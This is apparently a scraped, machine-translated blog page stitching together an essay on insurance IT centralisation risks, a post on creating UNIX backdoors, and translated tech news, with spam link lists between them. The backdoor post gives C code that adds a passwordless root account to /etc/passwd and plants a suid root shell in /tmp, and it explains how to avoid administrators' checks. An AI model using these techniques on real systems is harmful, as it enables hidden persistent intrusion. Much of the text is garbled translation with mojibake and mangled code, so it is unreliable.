Wednesday, October 20, 2010

Insurance Goes to focus on risks and preventive measures



Economic integration and socio-economic development, accelerating the need to break with tradition by regional financial industry fragmented and decentralized management business model, relying on the rapid development of information technology, technical innovation and focus on building centralized data processing environment is the trend.

"Reform of the State Council on the Development of the insurance industry views" clear that the establishment of a wide range of services, adequate solvency, comprehensive competitive power, development speed, quality and efficiency of the unity of the modern insurance industry. Whether to expand service areas, monitoring solvency, we need a strong business processing systems and vast amounts of data to support you. With large, accurate and timely data to develop products that meet market needs in order to enhance the intrinsic value of our products to ensure that the pace of development of business in order to constantly improve the company's core competencies in order to constantly improve company benefits. Large centralized data management is undoubtedly strong, the development of modern insurance industry has a positive role in promoting the development of modern insurance industry is the inevitable choice.

Since the Sixteenth Congress, China's insurance industry has maintained rapid development, overall competitiveness has been greatly improved, compared with developed insurance markets, the gap remains significant. With the full opening up the insurance industry, our insurance company faces enormous challenges and competitive pressures, how to quickly improve their core competitiveness, as each insurance company priority. Large concentration can effectively improve the company's governance bodies and management efficiency, improve the company's 鍒涙柊 capacity and efficiency, streamline the company's business processes, improve the company's service quality, improve the company's core competitiveness and ensure the company can freely Yingdui increasingly intense international competition.

Market players increases, the various insurance agencies, branches growing, if we continue to build the system in accordance with the decentralized model, the required technical personnel and equipment will be more and more the same time, investment in information technology spread, will inevitably result in equipment Gengxin slow, low utilization, spare parts difficult to reserves, the cost of system maintenance or upgrades will be increased significantly. Large centralized model to solve the decentralized model defects, data, technology, personnel, the three concentrations, help to improve the overall information technology insurance company level, particularly in disaster recovery capabilities and improve the system to ensure rational use of system resources are irreplaceable superiority.

Insurance Goes to focus on the main risk

As the insurance industry information technology investment continued to increase continuously promote construction of a large concentration of information technology has become the measure of the insurance enterprise's core competitiveness of an important symbol, for the insurance industry plays an important role. However, the major focus is also faced with significant potential risk, the higher the concentration, the more concentrated risk.

Large centralized systems are at greater risk

Centralized, insurance companies and even entire insurance group to achieve a centralized management system, the system risk is concentrated on one point. System itself consists mainly of planning and design risks, system-building technical risk, the risk of communication lines, the system safety risk, the risk of more attacks and the invasion of these risks in large centralized mode, the losses brought about far more than the scattered mode losses. Once systemic risk, the company will be paralyzed. Not only harm the interests of consumers, the company's image will suffer serious damage.

Large centralized management of risks facing the greater

Centralization 鍚? corporate data is more centralized, Ji Tong administrator Quanxian further strengthened, Guan Li officers of ethical standards and sense of responsibility right system has not ignore the impact of Anquan, need to improve the system, such as Lai Kaohe index system constraints and compliance personnel Xing Wei to promote management with a high sense of responsibility to protect the smooth operation of system security. As the business process remodeling and expanding the system functionality, the growing complexity of information center management, management, planning and construction of the system become very important, the adequacy of management systems, implementation is in place, the impact on the system running more and more apparent. In the traditional "heavy business, light management" information to the Construction, the company's information management originally very weak. Centralized, decentralized model adapted to the management of personnel and management systems, can not meet the needs of modern information management, risk management further increased.

Large concentration of investment are at greater risk

In order to enhance the company's core competitiveness, and increase the level of corporate information, many companies invested heavily to promote the construction of a large concentration. But the major focus of the building process is a complex, high technology, take a huge investment process, as at present, many companies have realized the physical sense, data on the large concentrated, from the application of the large concentration of well large gap between the operations center in order to complete the construction, technology companies need to set up stronger technical team, also need to keep putting in a lot of information technology capital, as little as several hundred million dollars, and several billion. If the event of a decision-making mistakes, there will be a huge investment can not achieve the desired results, the company has brought huge economic losses.

Large concentration of risk prevention measures

Data and focus on the business development constraints due to the conflict spread, so that the company management more effective, more competitive core. The company brought in a new space for development, but also created new problems, the risk of the spread into a concentrated destructive power has increased exponentially. To this end, we should actively explore the system of risk prevention and control strategies and measures to ensure the success of the system construction, system security and stability operation.

Scientific planning a large concentration of construction projects

Large concentration of complex project structure, invest high investment risk, there is no scientific, unified planning, the system is difficult to achieve good building construction results, and may even lead to project abortion. Therefore, a large concentration of projects in the planning, to the size of the company's business, business development speed, data size and frequency of such transactions were more accurate estimate of the feasibility of the project, construction goals, the construction and building costs were fully argument, and formed the basis of the system processing capability, communications capability, and defensive ability to quantify the number of such indicators and the scientific basis for project planning and design to ensure the design of scientific and feasible.

In accordance with high standards to strengthen the system infrastructure

Centralized system for large companies to run without interruption very high demand, the construction of the system should be in accordance with the high reliability, high redundancy and high scalability and other infrastructure required to enhance the system to ensure system reliability, redundancy more than enough scalability. That the whole system, including: hardware, software and communications system backup mechanism should be adopted to ensure that the system failure, can quickly return to normal operation; should establish off-site data backup systems, disaster recovery center, ensuring that the data lost or suffered physical damage can be rapid recovery; should actively explore and establish a system for distributed data backup mechanism, to prevent the information center and backup center while being attacked, to ensure the system can be effectively and timely recovery.

Building management system to enhance system operation

Centralization is complete, the system increasingly large, increasingly complex functions, how to ensure the orderly operation of the system, the management must pay attention. In practice, decentralized, non-uniform system is running hard to meet the needs of the development of modern insurance information. Big insurance companies should focus on projects as an opportunity to carefully sort out the business process, the background service management processes and rules and regulations, integrated operating resources, to establish a unified and standardized system operation management mechanism. According to various corporate systems running the actual situation, set a different, streamlined operation and management level, security system between China and Taiwan before and after the corresponding request in a timely manner. In the perfect system construction, the system continued to increase enforcement, strict accountability, the operation of the illegal operations personnel to increase penalties, increase awareness of operating personnel Compliance mourning, severely dealt a serious investigation of repeated violation of repeated institutions and personnel. Gradual implementation of information management, reduce manual intervention, to promote more standardized management system more secure and orderly operation.

Strengthen the safety monitoring system

Information systems always run a large number of variables in the environment, in order to understand the system running in time to avoid large-scale run accident, the need to strengthen system security monitoring system. Establish and improve safety monitoring system, specify the security monitoring positions, staff responsibilities, regulate safety monitoring work flow and work discipline. At the same time, enhance the quality of personnel training, security surveillance, monitoring personnel to strengthen the sense of responsibility, sense of crisis and emergency response capacity to improve staff safety monitoring and treatment failure capacity. Strengthen the safety monitoring systems, the security monitoring personnel only in a timely and accurate understanding of the whole system operating state, before a fault occurs to take effective measures to solve. Safety Monitoring System and security and defense systems, interaction between recovery system for monitoring personnel to find failure to take timely measures to prevent the problem from a variety of magnification. Efficient security monitoring system is to improve the system to prevent risks to ensure the smooth running of the strong support system.

Enhance the quality of personnel training

Generally go through the initial information, spread, control, integration, data management and maturity that several stages of development. Many companies at this stage the major focus is only technically, physically large concentration of control is still in the stage from the stage to the integrated development, information technology is still a long way to go. High-quality people not only can improve the quality and overall system efficiency, can further promote the development of information technology to high-end. Large centralized model in structure, management, technical with the decentralized model has a fundamentally different, the original model to adapt distributed hierarchical level system management and operating personnel can not adapt to large centralized mode of management and technical support . Enhance the quality of personnel training and improve the overall quality of personnel training to support the new technical system strong talent to become the top priority.







相关链接:



Simple AUTOMATION Tools



WinGate FAQ



E-cology In The Pan Micro Series 15



Wizard Games Card



Glibc 2 HOWTO English Version - 1. Introduction



Make Online Video Critical Information



MP4 to WMP



MKV to WMV



Some tips on data collection



Understanding of the process of DB2 Universal Database (2)



Test emergency response capacity of cities: urban emergency on the road



Dell "Ren Zhang" wrong Standard price order



ASF to MPG



Tuesday, October 12, 2010

Create UNIX Backdoor (primary chapter)



The easiest way is to add a password file passwd UID 0 accounts. But would rather not do, as long as the system administrator to check the password file will be "debacle" of. The following are in / etc / passwd password file, add a UID 0 account of the C program.

<+ +> Backdoor/backdoor1.c

# Include

main ()

(

FILE * fd;

fd = fopen ("/ etc / passwd", "a +");

fprintf (fd, "hax0r:: 0:0:: / root: / bin / sh
");

)

<->

Than this method is a little bit hidden password file will be stored in an account no one is using UID to 0, and the second field (password field) is set to empty. (Note, if you are using a higher version of * nix, we might have to modify / etc / shadow file.)

In the / tmp directory to place suid shell. After running the program as long as you will easily be the root user privileges. This method is almost the most popular. However, many systems every few hours, or every time you start will clear the / tmp directory data, and some systems are simply not allowed to run the / tmp directory suid program. Of course, you can modify or remove these restrictions themselves (because you are the root user, have permission to edit / var / spool / cron / crontabs / root and / etc / fstab file). The following are in / tmp directory to place suid shell program C source code.

<+ +> Backdoor/backdoor2.c

# Include

main ()

(

system ("cp / bin / sh / tmp / fid");

system ("chown root.root / tmp / fid");

system ("chmod 4755 / tmp / fid");

)

<->







Recommended links:



Good Graphic



Jiang Qiping Family Laboratory of Beijing University speech sounded "New Life Movement" horn



Wizard XML Or CSS Tools



Higher heat blow, "Kabbah Wind" paper submitted until 15th of the month



ASF To MPG



Tools And Editors Directory



GPS clock SYNCHRONIZATION



Intrusion Detection Terminology Keys



How to Write better bug report [2]



Infomation Gallery And Cataloging Tools



What is best dvd video to sony psp software



Sun rushes to THE fore: All Free



World Rally 3 cheat



MKV to WMV



Alert! Memory Part Of The Address Damage Caused By Crash



MP4 to WMP



Wednesday, October 6, 2010

Facebook users will soon break through 150 million



United States

The Washington Post: AOL executive vice president of product and marketing outgoing Conroy

Recently the news, AOL CEO 鍏拌开娉曞皵绉?(Randy Falco) in a memorandum to all members of staff, said, AOL Products and Marketing Kevin Conroy, executive vice president (Kevin Conroy) is about to leave and join AOL Univision.

According to foreign media reports, Falco said, Conroy will join Univision and served as president of its interactive media division, responsible for Internet and global mobile user experience.

Kevin left the BMG Entertainment 8 years ago to join AOL, first served as construction AOL Music department, and now it has become the world's leading Internet music library. Kevin Falco on his tenure at AOL contribution to the company to do that thanks. He said Kevin AOL products to more dynamic and to expand its global product development, strengthen the AOL market influence.

Currently, AOL Mail has been able to run on Mac platform. Kevin led the development of the iPhone AOL staff also won an application to take great success, as high as several million downloads.

Mediapost: 2013 years the United mobile broadband users will reach 140 million

U.S. market research firm Parks Associates to a new forecast, by 2013, the U.S. mobile broadband users by 2008 46 million to grow to 140 million.

According to foreign media reports, Parks Associates forecasts also show that in 2013 the growth of smart phone sales will more than double, reaching about 60 million.

Parks Associates analyst Anton Denisov (Anton Denissov) said, consumers will become increasingly accustomed to a comfortable and efficient mobile broadband service, and view them as part of everyday life, not only through broadband Internet surfing, play games, share photos, and can any time contact with friends through social networking sites.

Denisov also said that in 2008 the recession situation, the smart phone sales remain strong, fully embodied as a status symbol and a power of attraction. Therefore, there is no slowdown in sales of smart phones, or smart phone market response is slow, or is it more resistant to economic recession.

Denisoff to Apple as an example to explain the third quarter, Apple sold nearly 7 million 3G iPhone, easily beating analyst forecasts. The BlackBerry maker RIM's sales in the third quarter is a record of which part of the reason is that operators store the purchase of new high-resolution touch screen Storm and Bold mobile phone handset.

But Denisov acknowledged that the impact of the economic downturn, demand for smart phones is likely to slow this year. Parks Associates expects smartphone sales in 2009 grew by only 1 million will reach 19 million.

This year, mobile broadband users will grow by about 20% and reached 56 million. This figure will include a subscription-based and pull one of the mobile services.

Denisov said that despite the growth of mobile media audience for mobile media to attract advertisers, and other analysts is that the mobile advertising market is still in its infancy, substantial challenges remain, technology, and different carriers and mobile phone interaction between operational problems and so on.

JP Morgan said in a research report, mobile advertising will be severely from the recession.

But Deniseau said, advertising will become an important source of income to help offset the cost of mobile data traffic growth, network service operators typically charge a single Internet access fees, then the mobile content market revenue will be the key to development.

CNET: Zuckerberg: Facebook users will reach 150 million

Social network Facebook has said the site will reach 150 million active users of such a landmark figure. Before the site took four months to enable users to increase capacity from 100 million to 120 million, up from 120 million to the current 150 million with a mere two months. In fact, in mid-December last year, its subscribers had exceeded 140 million.

According to foreign media reports, Facebook founder and CEO Makezhake Berg (Mark Zucherberg) recently announced the news on his blog, and he also said that if Facebook to maintain this growth rate, then the only Web site set up 5 years in the spring of this year before the 25th birthday Zuckerberg has 200 million users.

According to Zuckerberg said that 150 million users, half of the people every day use Facebook, the current site of new registered users mainly from countries outside the U.S., the user covers all continents, including Antarctica. He compares, assuming that Facebook is a country populated extent that it can be ranked world No. 8.

But now this "Facebook empire" can not be regarded as the financial giant, the company which clearly stated that revenue growth is the most concern in the present company.

But in a downturn, the situation can not be blindly optimistic, those deep pockets of Facebook investors may find that income growth is not easy, as some industry analysts have pointed out, after all these open-consuming power of the web server's operating costs still relatively high, particularly in the United States.

England

VNU NET: HSBC opening of the new system against Internet fraud

HSBC recently opened a new authentication system to prevent online fraud and remote transactions.

According to foreign media reports, provided in the Authentify system, the authentication process independent of the network, and the user account and transaction details of the information input to be maintained by synchronizing the phone line and online operations, which would account for criminals to steal the invasion information becomes more difficult.

According to HSBC, said the portability of the system will provide users with the highest security assurance but it also brings the greatest convenience. And that the general two-factor authentication and authentication is not the same as in the two-factor authentication, the system provides users with an automatically generated one-time validation code, with user-set shared password. For example, online shopping, you can prevent by two-factor authentication without the knowledge that in the event of unauthorized use of your password when trading network fraud.

It is reported that some of the major British banks, including Barclays, Lloyds TSB, Nationwide and Royal Bank of Scotland have adopted two-factor authentication scheme, but HSBC and Abbey did not take the same approach, and that the practical effect of the lack of certification.

PSA last year in October, according to figures released by the British, as of June 2008, the United Kingdom between 6 months of online banking fraud losses amounted to 21.4 million pounds, is 1.85 times the same period in 2007.







相关链接:



DVR-MS to MP4



ASF converter



Comment Terminal And Telnet Clients



"Grey Dove" into a Small penguin confuse users into a "chicken"



Dell Notebook Case For The Core Trial Xiamen



3G2 TO MPEG



Easy to use E-Mail List Management



Good Browsers



Sonic Foundry Vegas 4.0 Dynamic Subtitles Novice Collection 16



New changes in PMP certification exam



For You Icons



Robin Li's family to restore a true story



The official CHINESE version of Firefox Mozilla FireFox 2.0.0.7



The latest and most fashionable tv mp5 player



Huang Ching-agents Accused Of Switching CPU Is Not Placed On File



ASP test two simple functions EXTERNAL to submit